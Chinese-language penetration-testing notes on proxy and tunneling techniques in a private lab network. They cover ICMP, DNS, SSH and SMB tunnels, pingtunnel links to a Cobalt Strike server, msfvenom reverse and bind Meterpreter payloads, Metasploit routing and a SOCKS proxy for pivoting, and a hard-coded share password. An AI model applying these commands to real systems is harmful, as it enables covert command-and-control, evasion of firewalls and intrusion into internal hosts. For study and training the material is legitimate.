代理&隧道技术

基础

1.单机 防火墙配置过程：高级防火墙配置–出入站添加规则即可

2.限制端口出入站 检测端口禁用了哪些，开放了哪些 端口出入站规则 正反向连接检测

3.限制协议出入站=>用其他协议上线 1.协议&TCP&UDP&ICMP&L2TP等

域控设置

gpmc.msc	=>强制=>其他域控成员不能修改策略定义的配置
域控成员执行命令：gpupdate/force

icmp协议隧道搭建

将tcp转换位icmp	攻击端接收icmp转换为tcp		木马监听端口	 
https://github.com/esrrhs/spp

https://github.com/bdamele/icmpsh

https://github.com/esrrhs/pingtunnel

攻击机:	cs服务端	kali=>msf
./pingtunnel -type server


上传文件到靶机=>执行命令
pingtunnel.exe -type client -l 127.0.0.1:port -s cs服务端ip -t cs服务端ip:端口 -tcp 1 -noprint 1 -nolog 1

dns隧道域名

创建三个域名	A  NS	NS 
监听器创建及配置payload(Beacon DNS)=>添加两个ns
后门绑定监听器及生成
dns

SSH隧道(域名)

用msf(cs)上线linux系统

于SSH协议存在于Linux系统，跳板机必须Linux
iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口，一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口，一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */

远程：针对入站过滤

ssh -CfNg -R 1234:内网ip:80 root@攻击机ip

本地：针对出站过滤

ssh -CfNg -L 1122:内网ip:80 root@linux靶机ip

ssh -CfNg -L 1122:192.168.3.31:80 root@192.168.43.41

SMB协议隧道

shell net use \\192.168.3.31 /u:webadmin admin!@#45

代理技术

环境:

内网网段 192.168.3.0

外网网段 192.168.43.0

攻击机:kali 192.168.43.3

centos7 192.168.43.52

sqlserver2012 192.168.3.32 192.168.43.55

webserver2008 192.168.3.31

===MSF代理上线(Proxifier代理)===

第一步、添加路由 限于MSF

kali 创建木马:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.3 lport=8911 -f exe > shell222.exe

监听端口
上线sqlserver

1)查看路由信息

run post/multi/manage/autoroute	#获取路由信息情况
run autoroute -p		#查看路由情况

2)添加指定路由(看需求可忽略)

route add 192.168.3.0 255.255.255.0 1
route add <IP> <掩码> <session>
route print

第二步、Sock代理 全局同用

kali:
use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1115
run

任意win启用代理软件proxifuer.exe配置Sock5代理 ip与端口设置上面配置的进行连接即可

服务器地址192.168.43.3	端口:1115

协议选择socks 5

代理规则192.168.3.*

第三步、MSF控制深层上线1-正向连接=>可创建多个

kali:创建正向连接木马
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=9999 -f exe > cab.exe

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.31  （此处为该层机器IP）
set lport 6666
run

SocksCap64(Normal User Mode)